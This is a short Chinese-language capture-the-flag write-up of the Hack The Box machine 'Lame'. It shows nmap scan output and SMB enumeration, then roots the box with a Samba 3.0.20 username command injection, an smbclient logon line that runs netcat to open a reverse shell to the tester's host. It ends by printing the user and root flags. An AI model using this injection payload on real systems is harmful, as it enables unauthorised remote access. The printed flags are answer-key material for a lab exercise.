[Meachines] Lame smbd3.0-RCE

发布于:2024-07-27 ⋅ 阅读:(32) ⋅ 点赞:(0)

信息收集

IP Address Opening Ports
10.10.10.3 TCP:21,22,139,445,3632

$ nmap -p- 10.10.10.3 --min-rate 1000 -sC -sV

21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-26T05:49:20-04:00
|_clock-skew: mean: 1h52m02s, deviation: 2h49m45s, median: -7m59s

Local&Root 权限

$ enum4linux 10.10.10.3

image-1.png

$ smbmap -H 10.10.10.3

image-2.png

$ smbclient //10.10.10.3/tmp

smb: \> logon "/=`nc 10.10.16.57 10032 -e /bin/sh`"

image-3.png

User.txt

image-4.png

76523648eeadf32972e21e2b375a3d61

Root.txt

image-5.png

38c7dbb369c9c855a5afc964693a5fa7


网站公告

今日签到

点亮在社区的每一天
去签到